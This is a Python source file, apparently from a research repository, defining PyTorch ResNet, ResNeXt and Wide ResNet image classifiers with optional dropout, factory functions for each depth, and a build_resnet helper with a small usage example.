out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None,
has_dropout=True):
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.dilation = 1
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(512 * block.expansion, num_classes)
self.has_dropout = has_dropout
self.dropout = nn.Dropout(p=0.5, inplace=False)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def _forward_impl(self, x):
# See note [TorchScript super()]
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
if self.has_dropout:
x = self.dropout(x)
x = self.fc(x)
return x
def forward(self, x):
return self._forward_impl(x)
def forward_feature(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
return x
def forward_feature_logit(self, x):
feature = self.forward_feature(x)
if self.has_dropout:
logit = self.dropout(feature)
else:
logit = feature
logit = self.fc(logit)
return feature, logit
def _resnet(arch, block, layers, pretrained, progress, **kwargs):
model = ResNet(block, layers, **kwargs)
if pretrained:
state_dict = load_state_dict_from_url(model_urls[arch],
progress=progress)
model.load_state_dict(state_dict, strict=False)
return model
def resnet18(pretrained=False, progress=True, **kwargs):
r"""ResNet-18 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet18', BasicBlock, [2, 2, 2, 2], pretrained, progress,
**kwargs)
def resnet34(pretrained=False, progress=True, **kwargs):
r"""ResNet-34 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet34', BasicBlock, [3, 4, 6, 3], pretrained, progress,
**kwargs)
def resnet50(pretrained=False, progress=True, **kwargs):
r"""ResNet-50 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet50', Bottleneck, [3, 4, 6, 3], pretrained, progress,
**kwargs)
def resnet101(pretrained=False, progress=True, **kwargs):
r"""ResNet-101 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet101', Bottleneck, [3, 4, 23, 3], pretrained, progress,
**kwargs)
def resnet152(pretrained=False, progress=True, **kwargs):
r"""ResNet-152 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet152', Bottleneck, [3, 8, 36, 3], pretrained, progress,
**kwargs)
def resnext50_32x4d(pretrained=False, progress=True, **kwargs):
r"""ResNeXt-50 32x4d model from
`"Aggregated Residual Transformation for Deep Neural Networks" <https://arxiv.org/pdf/1611.05431.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['groups'] = 32
kwargs['width_per_group'] = 4
return _resnet('resnext50_32x4d', Bottleneck, [3, 4, 6, 3],
pretrained, progress, **kwargs)
def resnext101_32x8d(pretrained=False, progress=True, **kwargs):
r"""ResNeXt-101 32x8d model from
`"Aggregated Residual Transformation for Deep Neural Networks" <https://arxiv.org/pdf/1611.05431.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['groups'] = 32
kwargs['width_per_group'] = 8
return _resnet('resnext101_32x8d', Bottleneck, [3, 4, 23, 3],
pretrained, progress, **kwargs)
def wide_resnet50_2(pretrained=False, progress=True, **kwargs):
r"""Wide ResNet-50-2 model from
`"Wide Residual Networks" <https://arxiv.org/pdf/1605.07146.pdf>`_
The model is the same as ResNet except for the bottleneck number of channels
which is twice larger in every block. The number of channels in outer 1x1
convolutions is the same, e.g. last block in ResNet-50 has 2048-512-2048
channels, and in Wide ResNet-50-2 has 2048-1024-2048.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['width_per_group'] = 64 * 2
return _resnet('wide_resnet50_2', Bottleneck, [3, 4, 6, 3],
pretrained, progress, **kwargs)
def wide_resnet101_2(pretrained=False, progress=True, **kwargs):
r"""Wide ResNet-101-2 model from
`"Wide Residual Networks" <https://arxiv.org/pdf/1605.07146.pdf>`_
The model is the same as ResNet except for the bottleneck number of channels
which is twice larger in every block. The number of channels in outer 1x1
convolutions is the same, e.g. last block in ResNet-50 has 2048-512-2048
channels, and in Wide ResNet-50-2 has 2048-1024-2048.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['width_per_group'] = 64 * 2
return _resnet('wide_resnet101_2', Bottleneck, [3, 4, 23, 3],
pretrained, progress, **kwargs)
def build_resnet(
encoder_name="resnet50",
num_classes=2,
pretrained=True,
has_dropout=True,
has_batchnorm=True,
) -> nn.Module:
"""
Args:
encoder_name (str, optional): [description]. Defaults to "resnet50".
num_classes (int, optional): [description]. Defaults to 2.
pretrained (bool, optional): [description]. Defaults to True.
checkpiont (bool, optional): checkpoint path.
Returns:
nn.Module: [description]
"""
# from torchvision import models
# model = models.resnet50(pretrained=pretrained)
norm_layer = nn.Identity if not has_batchnorm else None
model = eval(encoder_name)(
pretrained=pretrained,
has_dropout=has_dropout,
norm_layer=norm_layer
)
model.fc = nn.Linear(model.fc.in_features, num_classes)
return model
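# Minimal usage sketch: builds a ResNet-18 head without downloading pretrained weights
# and checks the output shape; sizes below are arbitrary assumptions.
if __name__ == "__main__":
    model = build_resnet(encoder_name="resnet18", num_classes=4, pretrained=False)
    out = model(torch.randn(2, 3, 224, 224))
    print(out.shape)   # torch.Size([2, 4])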
| 15,882 | Python | .py | 334 | 38.461078 | 107 | 0.633894 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |